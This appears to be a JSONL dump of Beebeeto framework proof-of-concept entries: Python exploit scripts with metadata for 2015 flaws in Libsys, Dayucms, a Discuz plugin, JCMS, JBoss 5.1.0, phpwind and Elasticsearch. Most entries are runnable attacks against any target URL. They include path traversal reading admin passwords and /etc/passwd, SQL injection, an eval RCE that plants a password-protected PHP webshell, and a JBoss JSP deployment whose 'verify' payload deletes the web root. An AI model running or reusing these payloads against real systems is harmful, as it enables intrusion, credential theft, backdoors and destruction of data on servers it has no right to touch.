{"create_date": "2015-06-09 16:33:29", "name": "\u6c47\u6587Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf /zplug/ajax_asyn_link.old.php \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "ko0zhi", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Libsys\u6f0f\u6d1e,/zplug/ajax_asyn_link.old.php\u6f0f\u6d1e,php,\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0109',\r\n 'name': '\u6c47\u6587Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf /zplug/ajax_asyn_link.old.php \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e POC',\r\n 'author': 'ko0zhi',\r\n 'create_date': '2015-06-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'libsys',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Read',\r\n 'tag': ['Libsys\u6f0f\u6d1e', '/zplug/ajax_asyn_link.old.php\u6f0f\u6d1e', 'php', '\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf'],\r\n 'desc': '''\r\n \u6c47\u6587\u8f6f\u4ef6Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n ''',\r\n 'references': 
['http://www.wooyun.org/bugs/wooyun-2014-059850'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/zplug/ajax_asyn_link.old.php?url='\r\n '../admin/opacadminpwd.php') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and '$strPassWdView' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6c47\u6587\u8f6f\u4ef6Libsys\u56fe\u4e66\u9986\u7ba1\u7406\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "Libsys", "id": "poc-2015-0109", "layer4_protocol": null}
{"create_date": "2015-06-09 16:27:23", "name": "Dayucms & Dircms <=1.526 /pay/order.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 5, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "Dircms\u6f0f\u6d1e,Dayucms\u6f0f\u6d1e,/pay/order.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport random\r\nimport base64\r\nimport hashlib\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0108',\r\n 'name': 'Dayucms & Dircms <=1.526 /pay/order.php \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2015-06-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Dayucms',\r\n 'vul_version': ['<=1.526'],\r\n 'type': 'Code Execution',\r\n 'tag': ['Dircms\u6f0f\u6d1e', 'Dayucms\u6f0f\u6d1e', '/pay/order.php', 'php'],\r\n 'desc': '''\r\n DayuCMS\u5728\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u6570\u7ec4\u7684\u51fd\u6570\u4e2d\u76f4\u63a5\u5229\u7528eval\uff0c\u5e76\u4e14\u5b58\u5728\u53ef\u63a7\u53d8\u91cf\uff0c\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n ''',\r\n 'references': ['http://joychou.org/index.php/web/dayucms-1-526-foreground-remote-code-execution.html',\r\n ],\r\n },\r\n }\r\n\r\n @staticmethod\r\n def md5_t(char):\r\n return hashlib.md5(char).hexdigest()\r\n\r\n @classmethod\r\n def dayucms_md5(cls, char):\r\n return cls.md5_t(char)[8:24]\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n ip = '2.2.2.2'\r\n filenum = random.randint(10000, 99999)\r\n filename 
= base64.b64encode('%d.php' % filenum)\r\n verify_url = '%s/pay/order.php' % args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n cookie = req.cookies\r\n for cookie_tuple in cookie.items():\r\n for k in cookie_tuple:\r\n if 'siteid' in k:\r\n cookie_pre = k\r\n break\r\n cookie_key = cls.dayucms_md5('productarray'+ip)\r\n cookie_key = cookie_pre[:-6] + cookie_key\r\n if args['options']['verbose']:\r\n print '[*] XFF is: %s' % ip\r\n print '[*] Cookie_key which need to add is: %s\\n' % cookie_key\r\n vs = 'PD9waHAgdmFyX2R1bXAobWQ1KDEyMykpO3VubGluayhfX0ZJTEVfXyk7'\r\n verify_shell = 'fputs(fopen(base64_decode(%s),w),base64_decode(%s))' % (filename, vs)\r\n verify_shell = '1%3b' + verify_shell\r\n false_headers = {'X-Forwarded-For': ip}\r\n false_cookies = {cookie_key: verify_shell, cookie_pre: '1'}\r\n verify_req = requests.get(verify_url, cookies = false_cookies, headers = false_headers)\r\n verify_shell_url = '%s/pay/%d.php' % (args['options']['target'], filenum)\r\n if '202cb962ac59075b964b07152d234b70' in requests.get(verify_shell_url).content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n ip = '2.2.2.2'\r\n filenum = random.randint(10000, 99999)\r\n filename = base64.b64encode('%d.php' % filenum)\r\n verify_url = '%s/pay/order.php' % args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n cookie = req.cookies\r\n for cookie_tuple in cookie.items():\r\n for k in cookie_tuple:\r\n if 'siteid' in k:\r\n cookie_pre = k\r\n break\r\n cookie_key = cls.dayucms_md5('productarray'+ip)\r\n cookie_key = cookie_pre[:-6] + cookie_key\r\n if args['options']['verbose']:\r\n print '[*] XFF is: %s' % ip\r\n print '[*] Cookie_key which need to add is: %s\\n' % cookie_key\r\n vs = 
'PD9waHAKdmFyX2R1bXAobWQ1KDEyMykpOwphc3NlcnQoCiRfUE9TVFtiZWViZWV0b10KKTs'\r\n webshell = 'fputs(fopen(base64_decode(%s),w),base64_decode(%s))' % (filename, vs)\r\n webshell = '1%3b' + webshell\r\n false_headers = {'X-Forwarded-For': ip}\r\n false_cookies = {cookie_key: webshell, cookie_pre: '1'}\r\n verify_req = requests.get(verify_url, cookies = false_cookies, headers = false_headers)\r\n shell_url = '%s/pay/%d.php' % (args['options']['target'], filenum)\r\n if '202cb962ac59075b964b07152d234b70' in requests.get(shell_url).content:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = shell_url\r\n args['poc_ret']['password'] = 'beebeeto'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DayuCMS\u5728\u5c06\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u6570\u7ec4\u7684\u51fd\u6570\u4e2d\u76f4\u63a5\u5229\u7528eval\uff0c\u5e76\u4e14\u5b58\u5728\u53ef\u63a7\u53d8\u91cf\uff0c\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002", "app_name": "Dayucms", "id": "poc-2015-0108", "layer4_protocol": null}
{"create_date": "2015-06-04 21:15:44", "name": "Discuz \u95ee\u5377\u8c03\u67e5\u63d2\u4ef6 /nds_ques_viewanswer.inc.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Discuz\u95ee\u5377\u8c03\u67e5\u4e13\u4e1a\u7248\u63d2\u4ef6\u6ce8\u5165,/nds_ques_viewanswer.inc.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0107',\r\n 'name': 'Discuz \u95ee\u5377\u8c03\u67e5\u63d2\u4ef6 /nds_ques_viewanswer.inc.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-06-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Discuz',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Discuz\u95ee\u5377\u8c03\u67e5\u4e13\u4e1a\u7248\u63d2\u4ef6\u6ce8\u5165', '/nds_ques_viewanswer.inc.php', 'php'],\r\n 'desc': 'Discuz plugin sql injection vulnerability.',\r\n 'references': ['http://0day5.com/archives/3184',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline'\r\n ' and 1=(updatexml(1,concat(0x27,md5(123)),1))--')\r\n verify_url = args['options']['target'] + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if '202cb962ac59075b964b07152d234b70' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return 
args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Discuz plugin sql injection vulnerability.", "app_name": "Discuz", "id": "poc-2015-0107", "layer4_protocol": null}
{"create_date": "2015-06-01 17:07:28", "name": "JCMS /opr_readfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "JCMS\u6f0f\u6d1e,/opr_readfile.jsp\u6f0f\u6d1e,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0106',\r\n 'name': 'JCMS /opr_readfile.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2015-06-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'JCMS',\r\n 'vul_version': ['*'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['JCMS\u6f0f\u6d1e', '/opr_readfile.jsp\u6f0f\u6d1e', 'jsp'],\r\n 'desc': '''\r\n \u5927\u6c49\u7248\u901ajcms\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n \u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...\r\n ''',\r\n 'references': ['http://www.ijindun.com/News/gonggao/2014/1125/178542.html'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n verify_url = ('%s/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename='\r\n 
'../../../../../../WEB-INF/ini/merpserver.ini') % url\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'AdminPW' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5927\u6c49\u7248\u901ajcms\u7cfb\u7edf\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\uff0c\u53ef\u4ee5\u76f4\u63a5\u83b7\u53d6\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5bc6\u7801\u660e\u6587\u3001\u6570\u636e\u5e93\u5bc6\u7801\u660e\u6587\u3001\r\n\u914d\u7f6e\u4fe1\u606f\u7b49\u975e\u5e38\u654f\u611f\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u8f7b\u677e\u5b9e\u73b0\u65e0\u4efb\u4f55\u9650\u5236\u83b7\u53d6 WEBSHELL ...", "app_name": "JCMS", "id": "poc-2015-0106", "layer4_protocol": null}
{"create_date": "2015-06-01 16:27:40", "name": "JBoss 5.1.0 DeploymentFileRepository \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "linglin", "rank": 4, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "JBoss\u6f0f\u6d1e,DeploymentFileRepository,Remot Code Execution", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0105',\r\n 'name': 'JBoss 5.1.0 DeploymentFileRepository \u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC',\r\n 'author': 'Linglin',\r\n 'create_date': '2015-05-28',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'JBoss',\r\n 'vul_version': ['5.1.0'],\r\n 'type': 'Code Execution',\r\n 'tag': ['JBoss\u6f0f\u6d1e', 'DeploymentFileRepository', 'Remot Code Execution'],\r\n 'desc': 'Jboss5.1.0\u9ed8\u8ba4\u914d\u7f6e\u5141\u8bb8\u76f4\u63a5\u90e8\u7f72\u4ee3\u7801\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u53ef\u4ee5\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u4ee3\u7801\u3002',\r\n 'references': ['http://www.securityfocus.com/bid/21219/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_code = ('\\n<%@ page import=\"java.util.*,java.io.*\" %>\\n<%@ page import=\"'\r\n 'java.io.*\"%>\\n<%\\nString path=request.getRealPath(\"\");\\nout.prin'\r\n 'tln(path);\\nFile d=new File(path);\\nif(d.exists()){\\n d.delete()'\r\n ';\\n }\\n%>\\n<% out.println(\"this_is_not_exist_9.1314923\");%>')\r\n payload = 
('action=invokeOp&name=jboss.admin%%3Aservice%%3DDeploymentFileRepositor'\r\n 'y&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%s&arg4=True')\r\n verify_data = payload % urllib2.quote(verify_code)\r\n verify_url = args['options']['target'] + '/jmx-console/HtmlAdaptor'\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n page_content = ''\r\n request = urllib2.Request(verify_url, verify_data)\r\n response = urllib2.urlopen(request)\r\n page_content = response.read()\r\n if 'this_is_not_exist_9.1314923' in page_content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Jboss5.1.0\u9ed8\u8ba4\u914d\u7f6e\u5141\u8bb8\u76f4\u63a5\u90e8\u7f72\u4ee3\u7801\u5230\u670d\u52a1\u5668\u4e0a\uff0c\u53ef\u4ee5\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u4ee3\u7801\u3002", "app_name": "Jboss", "id": "poc-2015-0105", "layer4_protocol": null}
{"create_date": "2015-05-25 10:53:09", "name": "phpwind v8.7 /goto.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u7cfb\u7edf\u6f0f\u6d1e,/goto.php\u6f0f\u6d1e,phpwind xss\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0104',\r\n 'name': 'phpwind v8.7 /goto.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-05-25',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['8.7'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['phpwind\u7cfb\u7edf\u6f0f\u6d1e', '/goto.php\u6f0f\u6d1e', 'phpwind xss\u6f0f\u6d1e', 'php'],\r\n 'desc': 'The first programming code flaw occurs at \"&url\" parameter in \"/goto.php?\" page.',\r\n 'references': ['http://seclists.org/fulldisclosure/2015/May/106',],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = '%s/goto.php?url=beebee\"><to>alert(1)</script>.com/' % args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and 'url=beebee\"><to>alert(1)</script>.com' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n 
pprint(mp.run())", "desc": "The first programming code flaw occurs at \"&url\" parameter in \"/goto.php?\" page.", "app_name": "PHPWind", "id": "poc-2015-0104", "layer4_protocol": null}
{"create_date": "2015-05-21 20:32:47", "name": "Elasticsearch < 1.4.5 / < 1.5.2 \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "tag": "Elasticsearch\u6f0f\u6d1e,ES \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e,CVE-2015-3337", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0103',\r\n 'name': 'Elasticsearch < 1.4.5 / < 1.5.2 \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e Exploit',\r\n 'author': '1024',\r\n 'create_date': '2015-05-21',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [9200],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elasticsearch',\r\n 'vul_version': ['1.5.2'],\r\n 'type': 'Arbitrary File Read',\r\n 'tag': ['Elasticsearch\u6f0f\u6d1e', 'ES \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e', 'CVE-2015-3337'],\r\n 'desc': '''\r\n Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2,\r\n when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.\r\n ''',\r\n 'references': [\r\n 'https://www.exploit-db.com/exploits/37054/',\r\n 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3337',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n # Include more plugin names to check if they are installed\r\n pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']\r\n target = urlparse.urlparse(args['options']['target'])\r\n for 
plugin in pluginList:\r\n es_test = '%s://%s:9200/_plugin/%s/../../../bin/elasticsearch' % \\\r\n (target.scheme, target.netloc, plugin)\r\n verify_url = '%s://%s:9200/_plugin/%s/../../../../../../etc/passwd' % \\\r\n (target.scheme, target.netloc, plugin)\r\n response = requests.get(es_test, timeout=8, allow_redirects=False)\r\n if \"ES_JAVA_OPTS\" in response.content:\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + es_test\r\n req = requests.get(verify_url, timeout=8)\r\n if req.status_code == 200:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n continue\r\n return args\r\n\r\n verify = exploit\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2,\r\nwhen a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.", "app_name": "ElasticSearch", "id": "poc-2015-0103", "layer4_protocol": null}
{"create_date": "2015-05-14 11:49:17", "name": "Elasticsearch _river \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u8d8a\u6743\u8bbf\u95ee", "tag": "Elasticsearch\u6f0f\u6d1e,\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0100',\r\n 'name': 'Elasticsearch _river \u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-05-14',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [9200],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elasticsearch',\r\n 'vul_version': ['*'],\r\n 'type': 'Privilege Escalation',\r\n 'tag': ['Elasticsearch\u6f0f\u6d1e', '\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e'],\r\n 'desc': 'elasticsearch\u5728\u5b89\u88c5\u4e86river\u4e4b\u540e\u53ef\u4ee5\u540c\u6b65\u591a\u79cd\u6570\u636e\u5e93\u6570\u636e\uff08\u5305\u62ec\u5173\u7cfb\u578b\u7684mysql\u3001mongodb\u7b49\uff09',\r\n 'references': ['http://zone.wooyun.org/content/20297',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target = urlparse.urlparse(args['options']['target'])\r\n verify_url = '%s://%s:9200/_river/_search' % (target.scheme, target.netloc)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url)\r\n if req.status_code == 200 and '_river' in req.content and 'type' 
in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "elasticsearch\u5728\u5b89\u88c5\u4e86river\u4e4b\u540e\u53ef\u4ee5\u540c\u6b65\u591a\u79cd\u6570\u636e\u5e93\u6570\u636e\uff08\u5305\u62ec\u5173\u7cfb\u578b\u7684mysql\u3001mongodb\u7b49\uff09", "app_name": "ElasticSearch", "id": "poc-2015-0100", "layer4_protocol": null}
